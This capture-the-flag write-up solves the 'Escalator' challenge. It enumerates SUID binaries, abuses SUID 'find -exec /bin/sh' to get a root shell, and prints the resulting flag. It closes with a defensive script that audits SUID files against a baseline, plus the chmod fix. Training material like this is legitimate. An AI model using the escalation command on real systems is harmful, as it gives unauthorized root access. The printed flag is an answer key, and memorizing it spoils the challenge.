# RSTCON 2024 - Escalator

**Title**: Escalator

**Description:** Help! We need someone to climb from the bottom to the top. Can you find the way?

_Escalate privileges to the root user and read the flag file in `/flag.txt`_

Access the environment via SSH: `ssh -p 7000 ctf-41bd06030f59@ssh.dyn.mctf.io`

## Solution:

First I SSHed into the instance and tried to `cat` the flag file, but it didn't work since we aren't the privileged user:

```bash
hackerman@af8f7997c0b3:/$ ls
bin boot dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
hackerman@af8f7997c0b3:/$ cat flag.txt
cat: flag.txt: Permission denied
```

My next instinct was to search for binaries with the SUID bit set (those that run as root):

```bash
hackerman@af8f7997c0b3:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/find
/usr/bin/su
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/umount
/usr/bin/newgrp
```

Now that we know we have a few binaries with the SUID bit set, the most interesting one I found for privilege escalation is `/usr/bin/find`, since `find` is extremely versatile and allows you to execute arbitrary commands via the `-exec` option. This flexibility lets you directly invoke a root shell or run commands with elevated privileges, which is ideal for privilege escalation. I tried leveraging the `find` binary to execute a command as root by running the following:

```bash
find . -exec /bin/sh \; -quit
```

This command uses `find` to execute a shell with root privileges due to the SUID bit. Once I had the root shell, I should be able to navigate to the `/root/` directory and read the `flag.txt` file.

```bash
hackerman@af8f7997c0b3:/$ find . -exec /bin/sh \; -quit
$
```

And this was successful: we spawned a shell with `find`. Now I tried reading the `flag.txt` directly:

```bash
$ find / -name flag.txt -exec cat {} \; 2>/dev/null
MetaCTF{bc2536631c6d285111bf3e7ed5db2c31}
```

And there's our flag: `MetaCTF{bc2536631c6d285111bf3e7ed5db2c31}`
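
From the defender's side, the SUID listing above is the signal: every entry except `find` is a binary that normally ships SUID. The following is an added example, not part of the original write-up; it flags SUID files that are missing from a baseline. The function name `audit_suid` and the baseline (the listing above minus `find`) are assumptions to adjust for your own image.

```shell
#!/bin/sh
# Added example: report SUID files that are not on an expected baseline.
# SUID_BASELINE is constructed from the listing in this write-up with
# `find` left out; it is an assumption, not a universal allowlist.
SUID_BASELINE="chsh su mount gpasswd chfn passwd umount newgrp"

# audit_suid ROOT
#   Prints one "UNEXPECTED SUID: <path>" line for each SUID regular file
#   under ROOT whose basename is not in SUID_BASELINE.
#   Returns 0 when nothing unexpected is found, 1 otherwise.
#   Matching is by basename only (a simplification); a production check
#   would compare full paths and file owners as well.
audit_suid() {
    findings=$(
        # -xdev stays on one filesystem, so /proc, /sys and other mounts
        # are skipped; -perm -4000 matches any file with the SUID bit set.
        find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
        while IFS= read -r path; do
            name=${path##*/}
            case " $SUID_BASELINE " in
                *" $name "*) ;;                            # expected
                *) printf 'UNEXPECTED SUID: %s\n' "$path" ;;
            esac
        done
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Usage: audit_suid /        (run as root so every directory is readable)
```

On the challenge host this check would report `/usr/bin/find`; the fix is `chmod u-s /usr/bin/find`.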